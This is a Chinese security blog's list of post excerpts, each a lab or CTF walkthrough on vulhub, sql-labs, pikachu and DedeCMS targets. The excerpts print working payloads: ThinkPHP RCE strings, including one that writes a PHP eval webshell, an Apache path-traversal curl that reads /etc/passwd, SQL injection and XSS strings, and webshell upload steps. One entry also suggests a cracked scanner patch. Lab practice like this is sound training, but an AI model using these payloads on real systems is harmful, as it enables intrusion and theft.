- 博客(48)
- 收藏
- 关注
原创 awvs使用流程
3.点击targets,然后点击 Add targets。4.这里使用我的pikachu靶场测试扫描。2.去网上找一个破解补丁包然后就进来了。6.点击targets,再点击scan。8.等到扫描结束会生成一份报告。1.安装好后进行登录。9.如图可以找到报告。
2024-09-25 17:23:52
325
原创 JBoss EJBInvokerServlet CVE-2013-4810 反序列化漏洞
此漏洞存在于JBoss中 /invoker/JMXInvokerServlet 路径。
2024-09-23 18:29:23
356
原创 Spring Data Rest 远程命令执行命令(CVE-2017-8046)
返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success。
2024-09-23 17:22:21
485
原创 Apache CVE-2021-41773 漏洞攻略
docker pull blueteamsteve/cve-2021-41773:no-cgiddocker run -d -p 8080:80 97308de4753dcurl http://192.16.10.190:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
2024-09-22 16:32:07
283
原创 dedecms靶场(四种webshell姿势
一。通过文件管理器上传WebShell1.登陆到后台点击核心-》文件式管理器-》文件上传 将准备好的一句话木马上传2.点击访问然后蚁剑连接二。修改模板文件拿WebShell1.点击-》模板-》默认模板管理-》index.htm-》修改在文件修改中添加一句话木马2.点击-》生成-》更新主页HTML-》将主页位置修改为./index.php】点击 -》生成静态-》更新主页HTML,再次访问站点首页可发现变化.3.蚁剑连接三。后台任意命令执行拿We
2024-09-17 13:48:06
599
原创 seafaring寻找漏洞
(1)下面有一个输入框,输入ls进行查看(2)输入echo '<??>' > qxl.php 并且访问(3)写入一句话木马,并且访问蚁剑连接echo '<??>'>q.php。
2024-09-13 15:29:36
747
原创 sqlgun靶场训练
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #-1' union select 1,group_concat(id,admin,pas
2024-09-13 14:36:40
693
原创 vulhub Thinkphp5 2-rce远程代码执行漏洞
192.168.33.162:8080?s=/Index/index/L/${@phpinfo()}192.168.33.162:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}
2024-09-08 14:47:31
240
原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)
vulhub/ghostscript/CVE-2018-16509/poc.png at master · vulhub/vulhub · GitHub
2024-09-08 14:35:36
211
原创 vulhub ThinkPHP5 5.0.23远程代码执行漏洞
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php
2024-09-08 14:08:11
419
原创 中间件解析漏洞
(1)在iis的网站根目录新建一个x.asp文件(2)在x.asp中新建⼀个jpg⽂件。内容为 asp代码。(3)在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏(4)将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏.
2024-09-05 18:51:05
514
原创 tomato靶场通关攻略
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。进入antibots中。
2024-09-04 14:44:33
422
原创 pikachu文件包含漏洞靶场
http://www.pikachu.com:90/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=%E6%8F%90%E4%BA%A4php.in:allow_url_fopen = onallow_url_include = on
2024-09-03 19:37:15
419
原创 SQL-labs靶场(61-65)
?id=1')) and updatexml(1,concat(1,(select database())),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+?id=1')) and updatexml(1,concat(1,(select group_concat(column
2024-09-02 14:50:44
784
原创 sql-labs靶场(51-60)
?sort=1' and updatexml(1,concat(1,(select database())),1) --+?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+判断数据库的第一个字符用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问
2024-08-31 16:58:09
632
原创 vulhub xxe靶机
1.访问靶机ip2.网址后面加robot.txt3.网址后面加xxe4.登录抓包放入重放器里5.使用xml 读取靶机中的 /etc/passwd 文件6.接下来通过php伪协议base64加密读 admin.php 源码 ()7.对得到的base64编码进行解码8.解码之后查找账号密码9.将密码进行md5解密10.登录 ip/xxe/admin.php 用刚才得到的用户名 administhebest,密码 admin@123登录。
2024-08-29 19:02:08
363
原创 sql-labs靶场(41-50)
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+?id=-1
2024-08-28 19:50:08
1067
原创 xxs靶场16-20关
<img src=1 onerror=alert('xss')>?arg01=a&arg02=%27%20onmouseover=alert("aini")
2024-08-28 19:03:24
551
原创 sql-labs靶场36-40关
?id=1%df' order by 4--+?id=1%df' order by 3--+?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where t
2024-08-27 18:11:16
1028
原创 sql注入靶场31-35关
?id=0") union select 1,2,3--+&&id=2?id=1&&id=0") union select 1,2,3 --+?id=1&&id=0" union select 1,database(),3 --+?id=1&&id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+?id=1&&id=0' union sel
2024-08-26 19:42:03
719
原创 xxs-labs通关攻略
包含外部的html文件?那这么说我把第一关的网址试一下尖括号被屏蔽了,而且我们不能构造出onclick等时间,因为没人点,但是我们可以构造个img,然后onerror方法,尝试一下。
2024-08-24 16:17:49
750
原创 各种数据库注入
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。
2024-08-20 19:53:31
834
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅